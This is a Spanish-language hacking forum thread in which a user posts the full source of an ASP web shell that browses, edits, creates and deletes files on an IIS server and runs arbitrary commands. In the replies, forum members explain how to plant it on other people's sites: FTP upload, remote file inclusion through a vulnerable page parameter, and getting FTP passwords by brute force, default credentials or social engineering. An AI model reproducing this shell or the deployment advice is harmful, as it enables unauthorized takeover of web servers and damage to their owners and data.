Mi Primer ASP Shell

Foro de elhacker.net

Seguridad Informática

Bugs y Exploits (Moderadores: Anon, berz3k)

Mi Primer ASP Shell

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1] 2

Autor

Tema: Mi Primer ASP Shell (Leído 9388 veces)

Morris

Ex-CoAdmin y
Ex-Staff

Desconectado

Mensajes: 1.977

Mi Primer ASP Shell

« en: 08 Febrero 2005, 04:13 »

Pues vamos al grano... no encontré un buen shell en ASP y decidí hacer uno y de paso practicar mi ASP.
[broma]
(creo que me tardé más en escribir MORRIS con "#" para firmarlo que en hacer el código, jajajaja)
[/broma]

Explota malas configuraciones del IIS.

Espero comentarios, sugerencias, mejoras, errores y testeos.

Morris

Código

<%
Propiedad = "www.elhacker.net"
 
' Este shell servirá en servidores con una mala configuración si el servidor NO ES vulnerable MANDARA ERRORES
' Esta herramienta ha sido creada para ayudar a los administradores a probar la configuración de su IIS
' NO ME HAGO RESPONSABLE POR EL MAL USO QUE SE LE DE A ESTA HERRAMIENTA
' Cualquier comentario y mejora se agradecerá morris@elhacker.net
' Este material es educacional y se debe de usar de la misma forma
' Si encuentras un servidor vulnerable que no sea tuyo, avisa al administrador. El te lo agradecerá.
 
' http://foro.elhacker.net/index.php/topic,56790.0.html
' ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### 
' ##### ##### ##### ##### VISITANOS EN ##### ##### ##### ##### 
' ##### ##### ##### ##### FORO.elhacker.net ##### ##### ##### ##### 
' ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### 
 
' Code by Morris
 
' ####       ####    #####    ######    ######    ##     ####
' ####      #####   #     #   ##    #   ##    #   ##    #
' ##  #    #   ##   #     #   ## ###    ## ###    ##     #####
' ##   #  #    ##   #     #   ##  #     ##  #     ##          #
' ##    #      ##    #####    ##   #    ##   #    ##     #####
 
 
ON ERROR RESUME NEXT
Archivo = "myshell.asp"
Accion = Request.QueryString("Accion")
Path = Request.QueryString("Path")
	IF Path = "" THEN
	Path = Server.MapPath(".")
	END IF
PathFile = Request.QueryString("PathFile")
 
' Crea instancia del FileSystemObject
Set MyFileObject=Server.CreateObject("Scripting.FileSystemObject")
' Create el objeto Folder
Set MyFolder=MyFileObject.GetFolder(Path)
'Loop a través de los folders
 
FUNCTION MapURL(path)
ON ERROR RESUME NEXT
     dim rootPath, url
 
     'Convierte la ruta fisica por una virtual para abrir los archivos
 
     rootPath = Server.MapPath("/")
     url = Right(path, Len(path) - Len(rootPath))
     MapURL = Replace(url, "\", "/")
 
END FUNCTION 
 
' RetVal = Shell("C:\WINDOWS\CALC.EXE", 1)   ' Run Calculator.
'response.Write(Path)
%>
 
<%
IF Propiedad = "" OR Propiedad <> "www.elhacker.net" THEN
Response.Write("<h1><font color=Red>Maldito lammer no borres la propiedad de este código -  <br>Propiedad www.elhacker.net - foro.elhacker.net</font></h1>")
Response.end
END IF
IF Accion = "Guardar" THEN
 
Set MyOutStream=MyFileObject.OpenTextFile(PathFile, 2, TRUE)
  MyOutStream.Write(Request.Form("texto"))
MyOutStream.Close
%>
La información ha sido guardada.
<br>
<a href="javascript:history.go(-2)">Regresar</a>
<%
END IF
 
IF Accion = "Ejecutar" THEN
On Error Resume Next
Dim Shell, Ejecutar
Set Shell = CreateObject("WScript.Shell")
Archivo = Request.QueryString("Archivo")
Set Ejecutar = Shell.Exec(Archivo)
Do While Ejecutar.Status = 0
     WScript.Sleep 100
Loop
WScript.Echo Ejecutar.Status
Response.Write("done")
END IF
 
IF Accion = "Nuevo" THEN
Archivo = Request.QueryString("Archivo")
	IF Archivo = "" THEN
	Archivo = "ArchivoNuevo.txt"
	END IF
 
Set fso = CreateObject("Scripting.FileSystemObject")
Set MyFile = fso.CreateTextFile(PathFile & "\" & Archivo, True)
MyFile.WriteLine("This is a test.")
MyFile.Close
END IF
 
IF Accion = "Borrar" THEN
Set fso = CreateObject("Scripting.FileSystemObject")
Set MyFile = fso.GetFile(PathFile)
MyFile.Delete
END IF
 
IF Accion = "Editar" THEN%>
 
<form action="<%=Archivo%>?Accion=Guardar&PathFile=<%=PathFile%>" method="post">
<textarea name="texto" cols=100 rows=25>
<%
 Set MyTextFile = MyFileObject.OpenTextFile(PathFile)
 WHILE NOT MyTextFile.AtEndOfStream
Response.Write( Server.HTMLEncode(MyTextFile.ReadLine) & Chr(10))
 WEND
 MyTextFile.Close
%>
</textarea>
<BR>
<input type=submit value="Guardar">
</form>
 
 
<%
Response.end
END IF
%>
<HTML>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#000000" VLINK="#000000">
<p><BR>
    <B>ASPShell by Morris - Version 1.0 - <a href="http://www.elhacker.net">elhacker.net</a></B><BR>
</p>
<form action="<%=Archivo%>">
<input name="Accion" type="hidden" value="Ruta">
<input name="Path" type="text" id="Path" value="<%=Path%>" size="70">
<input type="submit" value="Ir">
</form>
<br>
 
<TABLE BORDER=0 CELLPADDING=3 CELLSPACING=0 width="100%">
<TR BGCOLOR="#000000">
<TD><FONT COLOR="#FFFFFF"><B>Nombre de Archivo:</B></FONT></TD>
<TD><FONT COLOR="#FFFFFF"><B>Acciones:</B></FONT></TD>
<TD><FONT COLOR="#FFFFFF"><B>Tamaño:</B></FONT></TD>
<TD><FONT COLOR="#FFFFFF"><B>Tipo de archivo:</B></FONT></TD>
<TD><FONT COLOR="#FFFFFF"><B>Fecha de creación:</B></FONT></TD>
 
<%
FOR EACH thing in MyFolder.SubFolders
ON ERROR RESUME NEXT
%>
<TR BGCOLOR="#F7F7E7">
<TD><A HREF="<%=Archivo%>?Path=<%=Path%>\<%=thing.Name%>">[ <%=thing.Name%> ]</A></TD>
<TD></TD>
<TD ALIGN=RIGHT><%=thing.Size%>bytes</TD>
<TD><%=thing.Type%></TD>
<TD><%=thing.DateCreated%></TD> 
<%
NEXT
'Loop a través de los archivos
FOR EACH thing in MyFolder.Files
ON ERROR RESUME NEXT
url = MapURL(thing.path)
%>
 
 
<TR BGCOLOR="#F7F7E7">
<TD><A HREF="<%=Archivo%>?Path=<%=Path%>\<%=thing.Name%>&Accion=Editar"><%=thing.Name%></A></TD>
<TD><A HREF="<%=Archivo%>?Path=<%=Path%>&PathFile=<%=Path%>\<%=thing.Name%>&Accion=Borrar">Borar</A></TD>
<TD ALIGN=RIGHT><%=thing.Size%>bytes</TD>
<TD><%=thing.Type%></TD>
<TD><%=thing.DateCreated%></TD> 
<%
NEXT
%>
</TABLE>
 
 
Total de directorios
<%
Response.Write(MyFolder.SubFolders.Count )
%>
 
Total de archivos
<%
Response.Write(MyFolder.Files.Count )
%>
<br><br>
<form name="form1" action="<%=Archivo%>">
<input name="Path" type="hidden" value="<%=Path%>">
<input name="PathFile" type="hidden" value="<%=Path%>">
<input name="Accion" type="hidden" value="Nuevo">
  <input name="Archivo" type="text" id="Archivo" value="Nombre Archivo.ext">
  <input name="Submit" type="submit" value="Nuevo Archivo">
</form>
<strong><font color="#FF0000">Lo más recomendable es subir un .bat y ejecutar ese archivo poniendo la ruta completa hasta el .bat </font></strong>
<form name="form1" action="<%=Archivo%>">
<input name="Path" type="hidden" value="<%=Path%>/archivo.bat">
<input name="PathFile" type="hidden" value="<%=Path%>">
<input name="Accion" type="hidden" value="Ejecutar">
  <input name="Archivo" type="text" id="Archivo" value="<%Path%>">
  <input name="Submit" type="submit" value="Ejecutar">
</form>
 
</BODY>
</HTML>
 
<%
Response.Write("Visitanos en foro.elhacker.net")
%>


« Última modificación: 07 Agosto 2008, 21:09 por Azielito »	En línea

Factura
Ejemplos
Memorandum
Carta Recomendacion
www.ejemplode.com/12-clases_de_espanol/
www.ejemplosde.com

Natanael

Desconectado

Mensajes: 13

Nadie esta a salvo de la locura.

Re: Mi Primer ASP Shell

« Respuesta #1 en: 10 Abril 2005, 14:45 »

Eso es lenguaje HTMl?
Como se usa?


	En línea

Salu-DOS

+ enrique ZP

Desconectado

Mensajes: 2.942

X-Aqui

Re: Mi Primer ASP Shell

« Respuesta #2 en: 10 Abril 2005, 17:19 »

Cita de: Natanael en 10 Abril 2005, 14:45

Eso es lenguaje HTMl?
Como se usa?

No no es HTML lee el titulo de el post es ASP y pues se usa como cualquier otra shell creo, la subes al servidore y ella te dice el resto.


	En línea

Visita:

http://www.zonaphotoshop.com/

Morris

Ex-CoAdmin y
Ex-Staff

Desconectado

Mensajes: 1.977

Re: Mi Primer ASP Shell

« Respuesta #3 en: 11 Abril 2005, 17:51 »

Sólo súbela al servidor y ejecútala vía web... si es vulnerable verás que funciona


	En línea

Factura
Ejemplos
Memorandum
Carta Recomendacion
www.ejemplode.com/12-clases_de_espanol/
www.ejemplosde.com

BenRu

The Prodigy

Desconectado

Mensajes: 4.017

Primero la música y luego las palabras...

Re: Mi Primer ASP Shell

« Respuesta #4 en: 11 Abril 2005, 22:19 »

Cita de: Morris en 11 Abril 2005, 17:51

Sólo súbela al servidor y ejecútala vía web... si es vulnerable verás que funciona

Que quieres decir con esto?Como lo subo?


	En línea

"El arte está hecho para ser sentido y no para ser comprendido. Por eso, cada vez que se quiere hablar de él según la inteligencia, no se dicen mas que tonterías" Remy D Gourmont

TaU

Desconectado

Mensajes: 184

Re: Mi Primer ASP Shell

« Respuesta #5 en: 12 Abril 2005, 02:41 »

Citar

IF Propiedad = "" OR Propiedad <> "www.elhacker.net" THEN
Response.Write("<h1><font color=Red>Maldito lammer no borres la propiedad de este código - <br>Propiedad www.elhacker.net - foro.elhacker.net</font></h1>")
Response.end


	En línea

"Si no se vive como se piensa, se acabará pensando como se vive", Pep Figueres
Revolucionario / Presidente de Costa Rica / Primer jefe de estado de la historia en abolir el ejército / Catalán.
www.wadalbertia.org -<|¡^P

+ enrique ZP

Desconectado

Mensajes: 2.942

X-Aqui

Re: Mi Primer ASP Shell

« Respuesta #6 en: 12 Abril 2005, 02:43 »

Cita de: Ruben Ruiz en 11 Abril 2005, 22:19

Cita de: Morris en 11 Abril 2005, 17:51

Sólo súbela al servidor y ejecútala vía web... si es vulnerable verás que funciona

Que quieres decir con esto?Como lo subo?

Lo que quiere decir es que te vallas a tu cliente FTP, y lo subas a la cuenta de tu host. Cuando lo hayas subido te vas a tu explorador escribes la url en donde esta localizada la shell y la ejecutas, y ella te va a dar instrucciones de como hacerlo creo.

Hasta Pronto


	En línea

Visita:

http://www.zonaphotoshop.com/

dxr

Colaborador

Desconectado

Mensajes: 2.947

Re: Mi Primer ASP Shell

« Respuesta #7 en: 13 Abril 2005, 04:01 »

Muy buen script Morris

nose si algun dia lo usare pero me a gustao


	En línea

Hacer preguntas concretas, claras y aportando toda la documentación necesaria.
De lo contrario, no tendreis una respuesta clara.

Morris

Ex-CoAdmin y
Ex-Staff

Desconectado

Mensajes: 1.977

Re: Mi Primer ASP Shell

« Respuesta #8 en: 13 Abril 2005, 17:54 »

Gracias Derek

me haz alegrado el día

Efectivamente suban el ASP por FTP o copienlo en la carpeta www de la forma que se les ocurra, de ahí accesen por web

http://www.dominio.com/myshell.asp

Lo demás es intuitivo.


	En línea

Factura
Ejemplos
Memorandum
Carta Recomendacion
www.ejemplode.com/12-clases_de_espanol/
www.ejemplosde.com

track1

Desconectado

Mensajes: 103

Re: Mi Primer ASP Shell

« Respuesta #9 en: 14 Julio 2006, 03:51 »

Bueno ya voy entendiendo, veamos, copio el codigo, por cierto le debo poner extensión .asp, verdad?? luego la subo a mi ftp, pero como hago, mi ftp tiene user y pass, que deberia hacer?? y por ultimo voy y redirigo la web vulnerable agrgandole la direccion (page=xxx) de mi ftp. Es asi?? $:-\$


	En línea

NO HAY CAMINO HACIA LA PAZ,
LA PAZ ES EL CAMINO

Morris

Ex-CoAdmin y
Ex-Staff

Desconectado

Mensajes: 1.977

Re: Mi Primer ASP Shell

« Respuesta #10 en: 14 Julio 2006, 04:06 »

Lo cipias, lo pegas en el notepad, lo guardas con extensión asp.

Para subirlo a alguna web necesitas utilizar algún bug o subirlo por ftp (necesitas un password o un bug)

Luego entras vía http y lo ejecutas por internet explorer.


	En línea

Factura
Ejemplos
Memorandum
Carta Recomendacion
www.ejemplode.com/12-clases_de_espanol/
www.ejemplosde.com

track1

Desconectado

Mensajes: 103

Re: Mi Primer ASP Shell

« Respuesta #11 en: 14 Julio 2006, 17:35 »

Hola, esto es lo que no entiendo: Luego entras vía http y lo ejecutas por internet explorer.
Pero como? Por ejemplo ya tengo una web con el bug pagina=http://www.foro.elhacker.net , entonces para aprovechar el bug quedaria algo asi: http://www.xxxxx.com/index.asp?pais=xxx&pagina=http://www.foro.elhacker.net
entonces si colocora el codigo de la shell en la web del foro tendria que agregarle la ubicacion de la shell y quedaria algo como esto: http://www.xxxxx.com/index.asp?pais=xxx&pagina=http://www.foro.elhacker.net/myshell.asp
Estoy en lo correcto???


	En línea

NO HAY CAMINO HACIA LA PAZ,
LA PAZ ES EL CAMINO

whaky

Desconectado

Mensajes: 151

Angel del Infierno

Re: Mi Primer ASP Shell

« Respuesta #12 en: 15 Julio 2006, 00:28 »

www.paginavulnerable.com/index.asp?pais=xxx&pagina=http://www.tudominiocontushell.com/shell.asp

asi quedaria


	En línea

Los muertos hablan y las paredes oyen
por si acaso nunca reveles tu identidad.

track1

Desconectado

Mensajes: 103

Re: Mi Primer ASP Shell

« Respuesta #13 en: 15 Julio 2006, 03:36 »

Gracias Whaky, ahora solo no entiendo como podria hacer una cuenta ftp y poderla usar para tener ahi la shell, me refiero a que las cuentas ftp piden user y pass y no entiendo como podria hacer.
Me refiero que al link que se le agrega a la web vulnerable es por ejemplo asi: http://ftp://ftp.web.com pero cuando se quiera acceder ahi va a pedir el loggin. Como se haria??


	En línea

NO HAY CAMINO HACIA LA PAZ,
LA PAZ ES EL CAMINO

Morris

Ex-CoAdmin y
Ex-Staff

Desconectado

Mensajes: 1.977

Re: Mi Primer ASP Shell

« Respuesta #14 en: 18 Julio 2006, 05:22 »

Fuerza bruta.
Password default.
Bug en FTP
Robando el user y pwd mediante ingeniería social.
Con algún bug de upload que te permita subir archivos a la web.


	En línea

Factura
Ejemplos
Memorandum
Carta Recomendacion
www.ejemplode.com/12-clases_de_espanol/
www.ejemplosde.com

Páginas: [1] 2

Ir a: